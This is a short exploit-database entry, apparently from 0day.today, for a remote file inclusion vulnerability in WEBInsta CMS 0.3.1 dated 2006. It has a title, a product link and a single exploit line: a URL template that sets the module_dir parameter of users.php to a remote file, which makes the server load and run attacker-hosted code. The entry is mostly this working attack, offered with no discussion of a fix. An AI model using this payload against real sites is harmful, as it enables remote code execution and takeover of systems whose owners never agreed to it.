id: 696
date: 08/14/2006
title: WEBInsta CMS <= 0.3.1 (users.php) Remote File Include Vulnerability
author: Yns
cves: 

===================================================================
WEBInsta CMS <= 0.3.1 (users.php) Remote File Include Vulnerability
===================================================================



/*
Vulnerable product : http://www.webinsta.com/download.html ( WEBInsta. CMS 0.3.1 )
Author : Yns - yns.zaxaz.com
*/

Exploit:
http://[HOST]/[PATH]/modules/usersonline/users.php?module_dir=[REMOTE_FILE]




#  0day.today [2023-03-24]  #